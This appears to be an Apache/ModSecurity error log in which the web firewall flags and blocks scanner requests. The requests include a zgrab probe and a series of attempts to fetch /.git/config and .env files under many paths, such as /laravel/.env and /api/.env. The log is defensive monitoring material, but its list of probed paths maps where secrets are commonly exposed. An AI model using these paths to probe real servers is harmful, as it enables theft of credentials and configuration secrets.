[Sat Aug 23 12:06:22.860286 2025] [:error] [pid 2169502] [client 67.213.121.215:35164] [client 67.213.121.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aKmSnpSxcXGgFs-ixH5-tAAAAAo"]
[Sat Aug 23 20:29:38.031295 2025] [:error] [pid 2178510] [client 3.138.185.30:50281] [client 3.138.185.30] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aKoIkushA4dfhADRmGyUogAAAAc"]
[Sat Aug 23 20:29:38.031683 2025] [:error] [pid 2178510] [client 3.138.185.30:50281] [client 3.138.185.30] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aKoIkushA4dfhADRmGyUogAAAAc"]
[Sat Aug 23 20:29:38.031875 2025] [:error] [pid 2178510] [client 3.138.185.30:50281] [client 3.138.185.30] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aKoIkushA4dfhADRmGyUogAAAAc"]
[Mon Aug 25 06:08:07.935588 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aKvhp7tVUX2n2FxK3s0XWwAAAAA"]
[Mon Aug 25 06:08:07.935964 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aKvhp7tVUX2n2FxK3s0XWwAAAAA"]
[Mon Aug 25 06:08:07.936130 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aKvhp7tVUX2n2FxK3s0XWwAAAAA"]
[Mon Aug 25 06:08:07.969301 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aKvhp7tVUX2n2FxK3s0XXAAAAAA"]
[Mon Aug 25 06:08:07.969679 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aKvhp7tVUX2n2FxK3s0XXAAAAAA"]
[Mon Aug 25 06:08:07.969843 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aKvhp7tVUX2n2FxK3s0XXAAAAAA"]
[Mon Aug 25 06:08:08.004505 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aKvhqLtVUX2n2FxK3s0XXQAAAAA"]
[Mon Aug 25 06:08:08.004869 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aKvhqLtVUX2n2FxK3s0XXQAAAAA"]
[Mon Aug 25 06:08:08.005037 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aKvhqLtVUX2n2FxK3s0XXQAAAAA"]
[Mon Aug 25 06:08:08.560800 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XXwAAAAA"]
[Mon Aug 25 06:08:08.561179 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XXwAAAAA"]
[Mon Aug 25 06:08:08.561345 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XXwAAAAA"]
[Mon Aug 25 06:08:08.594879 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aKvhqLtVUX2n2FxK3s0XYAAAAAA"]
[Mon Aug 25 06:08:08.595246 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aKvhqLtVUX2n2FxK3s0XYAAAAAA"]
[Mon Aug 25 06:08:08.595414 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aKvhqLtVUX2n2FxK3s0XYAAAAAA"]
[Mon Aug 25 06:08:08.642588 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XYQAAAAA"]
[Mon Aug 25 06:08:08.642966 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XYQAAAAA"]
[Mon Aug 25 06:08:08.643156 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XYQAAAAA"]
[Mon Aug 25 06:08:08.694861 2025] [authz_core:error] [pid 2215383] [client 91.169.13.169:37205] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Mon Aug 25 06:08:08.728715 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XYwAAAAA"]
[Mon Aug 25 06:08:08.729094 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XYwAAAAA"]
[Mon Aug 25 06:08:08.729280 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XYwAAAAA"]
[Mon Aug 25 06:08:08.783650 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XZAAAAAA"]
[Mon Aug 25 06:08:08.784026 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XZAAAAAA"]
[Mon Aug 25 06:08:08.784249 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aKvhqLtVUX2n2FxK3s0XZAAAAAA"]
[Mon Aug 25 06:08:09.311243 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XZgAAAAA"]
[Mon Aug 25 06:08:09.311681 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XZgAAAAA"]
[Mon Aug 25 06:08:09.311867 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XZgAAAAA"]
[Mon Aug 25 06:08:09.345050 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /library/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/library/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XZwAAAAA"]
[Mon Aug 25 06:08:09.345414 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/library/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XZwAAAAA"]
[Mon Aug 25 06:08:09.345576 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/library/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XZwAAAAA"]
[Mon Aug 25 06:08:09.386283 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nextjs-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/nextjs-app/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XaAAAAAA"]
[Mon Aug 25 06:08:09.386689 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/nextjs-app/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XaAAAAAA"]
[Mon Aug 25 06:08:09.386860 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/nextjs-app/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XaAAAAAA"]
[Mon Aug 25 06:08:09.424233 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node-api/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XaQAAAAA"]
[Mon Aug 25 06:08:09.424626 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node-api/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XaQAAAAA"]
[Mon Aug 25 06:08:09.424800 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node-api/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XaQAAAAA"]
[Mon Aug 25 06:08:09.470246 2025] [authz_core:error] [pid 2215383] [client 91.169.13.169:37205] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
